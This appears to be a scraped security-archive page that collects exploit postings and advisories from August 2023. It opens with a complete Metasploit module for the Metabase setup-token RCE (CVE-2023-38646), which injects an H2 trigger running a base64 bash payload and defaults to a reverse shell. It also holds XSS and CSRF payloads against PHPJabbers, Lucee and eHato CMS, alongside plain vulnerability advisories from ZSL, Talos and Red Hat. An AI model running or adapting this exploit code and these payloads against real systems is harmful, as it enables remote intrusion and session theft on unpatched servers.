Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token is accessible even after the setup process has been completed. With this token a user is able to submit the setup functionality to create a new database. When creating a new database, an H2 database string is created with a TRIGGER that allows for code execution. We use a sample database for our connection string to prevent corrupting real databases. Successfully tested against Metabase 0.46.6.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Metabase Setup Token RCE',        'Description' => %q{          Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token          is accessible even after the setup process has been completed. With this token          a user is able to submit the setup functionality to create a new database.          When creating a new database, an H2 database string is created with a TRIGGER          that allows for code execution. We use a sample database for our connection          string to prevent corrupting real databases.          Successfully tested against Metabase 0.46.6.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Maxwell Garrett', # original PoC, analysis          'Shubham Shah' # original PoC, analysis        ],        'References' => [          ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],          ['URL', 'https://www.metabase.com/blog/security-advisory'],          ['CVE', '2023-38646']        ],        'Platform' => ['unix'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/unix/reverse_bash'          # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python        },        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2023-07-22',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(3000),        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])      ]    )  end  def get_bootstrap_json_blob_from_html_resp(html)    %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html    begin      JSON.parse(Regexp.last_match(1))    rescue JSON::ParserError, TypeError      print_bad('Unable to parse JSON blob')      nil    end  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    json = get_bootstrap_json_blob_from_html_resp(res.body)    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?    version = json.dig('version', 'tag')    return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?    # typically v0.46.6    version = version.gsub('v', '')    if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')      return CheckCode::Appears("Version Detected: #{version}")    end    CheckCode::Safe("Version not vulnerable: #{version}")  end  def exploit    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200    json = get_bootstrap_json_blob_from_html_resp(res.body)    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?    setup_token = json['setup-token']    if setup_token.nil?      print_status('Setup token is nil, checking secondary location')      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),        'method' => 'GET'      )      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200      json = res.get_json_document      setup_token = json['setup-token']    end    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?    print_good("Found setup token: #{setup_token}")    print_status('Sending exploit (may take a few seconds)')    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them    b64_pe = ::Base64.strict_encode64(payload.encoded)    equals_count = b64_pe.count('=')    if equals_count > 0      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)    end    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),      'method' => 'POST',      'ctype' => 'application/json',      'data' => {        'token' => setup_token,        'details' =>          {            # 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get            # 'is_full_sync' => false,            # 'is_sample' => false,            # 'cache_ttl' => nil,            # 'refingerprint' => false,            # 'auto_run_queries' => true,            # 'schedules' => {},            'details' =>              {                'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",                'advanced-options' => false,                'ssl' => true              },            'name' => Rex::Text.rand_text_alphanumeric(6..12),            'engine' => 'h2'          }      }.to_json    )  endend

Metabase Remote Code Execution

The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

Title: EuroTel EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability  
Advisory ID: ZSL-2023-5784  
Type: Local/Remote  
Impact: Security Bypass, Exposure of System Information, Exposure of Sensitive Information, System Access, DoS, Privilege Escalation  
Risk: (5/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_config.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability

The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

Title: EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)  
Advisory ID: ZSL-2023-5783  
Type: Local/Remote  
Impact: Privilege Escalation, Security Bypass  
Risk: (4/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_idor.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)

The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

Title: EuroTel ETL3100 Transmitter Default Credentials  
Advisory ID: ZSL-2023-5782  
Type: Local/Remote  
Impact: System Access, Exposure of System Information, Exposure of Sensitive Information  
Risk: (4/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_creds.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Default Credentials

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

Wednesday, August 9, 2023 12:08

Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader, one of the most popular PDF reader alternatives to Adobe Acrobat.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Multiple vulnerabilities in Open Babel software**

Talos researchers recently discovered multiple vulnerabilities in Open Babel, an open-source software library used in a variety of chemistry and research settings.

Open Babel allows users to “search, convert, analyze, or store data from molecular modeling, chemistry, solid-state materials, biochemistry, or related areas,” according to its website, and is used in other popular pieces of software in the science field. Therefore, there are cases where these vulnerabilities are accessible via the internet.

The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted, malformed file. Depending on the platform and on how the code is compiled, these vulnerabilities could lead to arbitrary code execution:

*   TALOS-2022-1664 (CVE-2022-43607)
*   TALOS-2022-1665 (CVE-2022-46289, CVE-2022-46290)
*   TALOS-2022-1666 (CVE-2022-46292, CVE-2022-46295, CVE-2022-46294, CVE-2022-46293, CVE-2022-46291)
*   TALOS-2022-1667 (CVE-2022-41793)
*   TALOS-2022-1668 (CVE-2022-42885)
*   TALOS-2022-1669 (CVE-2022-44451)
*   TALOS-2022-1670 (CVE-2022-46280)
*   TALOS-2022-1671 (CVE-2022-43467)
*   TALOS-2022-1672 (CVE-2022-37331)

Talos is disclosing these vulnerabilities despite no official fix from Open Babel. The vendor declined to release an update within the 90-day period as outlined in Cisco’s vulnerability disclosure policy.

**Several issues in Foxit PDF reader could lead to arbitrary code execution**

Foxit PDF Reader is one of the most popular PDF readers on the market, offering many similar features to Adobe Acrobat. The software also includes a browser extension that allows users to read PDFs right in their web browsers.

Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine. An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or, if the user has the browser extension enabled, by visiting a malicious web page:

*   TALOS-2023-1739 (CVE-2023-28744)
*   TALOS-2023-1756 (CVE-2023-27379)
*   TALOS-2023-1757 (CVE-2023-33866)
*   TALOS-2023-1795 (CVE-2023-32664)
*   TALOS-2023-1796 (CVE-2023-33876)

Out-of-bounds write vulnerabilities in popular chemistry software; Foxit PDF Reader issues could lead to remote code execution

Red Hat Security Advisory 2023-4575-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.5.4 security fixes and enhancements  
Advisory ID:       RHSA-2023:4575-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4575  
Issue date:        2023-08-08  
CVE Names:         CVE-2020-24736 CVE-2022-36227 CVE-2023-0361   
                   CVE-2023-1667 CVE-2023-2283 CVE-2023-3089   
                   CVE-2023-26604 CVE-2023-27535 CVE-2023-38408   
=====================================================================

1. Summary:

VolSync v0.5.4 security fixes and enhancements

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/add-ons/add-ons-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync container  
images.

Security fix(es):  
* CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/add-ons/add-ons-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qN6AAoJENzjgjWX9erETT4P/jVK3VSrR8KdFizXGwnuczFA  
0gRx22ceAB0VrjvEUCSlM+Qlcn0WknT6cMWckoC0G9KzehbLcBbSsT5IOlm+MQ2R  
6qRBz6QMnY+d/7eMBnXY4h2EDXMKLD31Wj5DOjy4G6GbfaxPSgWUkNR1x+wKmcms  
uZTCZmsiRjwXJ0lG/Wx+Hf3N/Y8txhIAPi6PQ7C2kMqjEwWN87a0rRgg7JgccBGt  
Vibfd+a+AdcUcfMOUiPnHBFckTC6kLxCsaCY8mgsz0/B0RtU7XzeX7uHWxzYGQuc  
2C2Py9XhRpIEG9SsXLFTNc3nu3IjPWkLU0TCMgb7+K1MqKqhmuOyYBd9Bt+4/3tE  
2RkRdT3usUCr/jPSEJpxZs7ykb+7MNgMG54dDXQyPIBvw2AEL3p/0eHZ4wSIhsqK  
cUgsYCfzoXs5FS6xDfxKB8fohUxOTH1QLD5vx1Yob7yZ8wz+YeNH3pGIW5gLbWOd  
VopcJo3kl8zDABnD9nKDMpyiKM5yla3ql6oj4u89Stgi/2MObeqSF7VL06C68YLT  
SjEVcoPxR+LMFRx9PuiI4m7yGveQ0K0GUqvMv8H3z1CZn+K+BAIO4/Oi6jEGXsy2  
erTvAcG5NyEaUrh6UhEGGYNcIYMGDR9IJDf8TzSYkglhDNjLHeeJsNCpG8BjjD2u  
lmL1i5Wt+SLRbBa8q/MV  
=AN0W  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4575-01

PHPJabbers Vacation Rental Script version 4.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF# Date: 05/08/2023# Exploit Author: Hasan Ali YILDIR# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/vacation-rental-script/# Version: 4.0# Tested on: Windows 10 Pro## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsTechnical Detail / POC==========================1. Login Account2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)[1] Cross-Site Request ForgeryRequest:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>[2] Cross-Site Scripting (XSS)Request:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>

PHPJabbers Vacation Rental Script 4.0 Cross Site Request Forgery

Red Hat Security Advisory 2023-4576-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.6.3 security fixes and enhancements  
Advisory ID:       RHSA-2023:4576-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4576  
Issue date:        2023-08-08  
CVE Names:         CVE-2020-24736 CVE-2022-35252 CVE-2022-36227   
                   CVE-2022-43552 CVE-2023-0361 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-3089 CVE-2023-24329   
                   CVE-2023-26604 CVE-2023-27535 CVE-2023-38408   
=====================================================================

1. Summary:

VolSync v0.6.3 security fixes and enhancements

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync container  
images.

Security fix(es): * CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-35252  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-43552  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qNmAAoJENzjgjWX9erE0XEQAIGkOtzF36HLk9zsNN5ViO05  
pDEBBDxN3Q/V9eRKMxy+lNlUgk3jjc4SqxZlnJtCU13Vr+CUbZcikWLmwSTXh7gb  
ATEyBur+2i2GCPi/CQzZIe37rGO0xl6swaMFhTa8U0/q1rzQRSr73xfuxyEhL96j  
V1kMxK7WLvezcnkbo9eyw4V7vZVOqGXJEARTUGn5MyivnwoMDLiGLKJV/quXdPve  
zQFWuccegjdgNjzwGYxTe0aJnAXHOf19c4OD8KZ+GE+2QBlV1D68/D9+mljWSheO  
gP/IsqnuWGcZkngIU/nYhoBitGWgY13PRKNDiAGfF5ro1cgHeT/fGZ7tyWmYC/lq  
JM0jBTLh+LA1L+nFuBKArzfVaSviGXcz2+LR0aBIZfRvB4mqDP+mUnW3r1HF9Aa3  
3kHcgpdsHA5NT4FwCDKmiAw7C9QRdow2qiyOuInhMt+iGfC02j1ohAXgt4sW68gb  
P6QSR4/olTtJXmOuZwuRWXwDHxBxUrS4XEVwFqZ+TOM+a9Q9y3Wb8+09Kl9lv0RT  
z4oFmL3W5+9pC8AAqbYkyy66dWNjWYu4GHAGOpRA9K6B5maF4F8cijIuf4sTlmx2  
vhlJD8vGuyViI/Rwt9klaXTX2on4LBg/jBqWiwHdCwNpdPjBUWRNRNAsF4S+0BZN  
Kyoemtm32fm6VGubKbdW  
=8t4D  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4576-01

Lucee version 5.4.2.17 suffers from a cross site scripting vulnerability.

    # Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS# Google Dork: NA# Date: 05/08/2023# Exploit Author: Yehia Elghaly# Vendor Homepage: https://www.lucee.org/# Software Link: https://download.lucee.org/# Version: << 5.4.2.17# Tested on: Windows 10# CVE: N/ASummary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java.Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.The payload: ?msg=<img src=xss onerror=alert('xssya')>http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3EPOST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1Host: 172.16.110.130:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 278Origin: http://172.16.110.130:8888Connection: closeReferer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=createCookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overviewUpgrade-Insecure-Requests: 1name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit[Affected Component]Debugging-->TemplateService --> SearchServices  --> Event GatewayService --> Logging

Lucee 5.4.2.17 Cross Site Scripting

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

**eHato CMS 1.0 Cross Site Scripting**

Posted Aug 9, 2023

Authored by indoushka

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2

Download | Favorite | View

**eHato CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : eHato CMS 1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.ehato.com                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,924)
*   Arbitrary (16,191)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,343)
*   DoS (23,415)
*   Encryption (2,369)
*   Exploit (51,833)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,142)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,753)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,361)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,765)
*   Web (9,661)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,926)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,418)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,709)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,803)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Tag

#web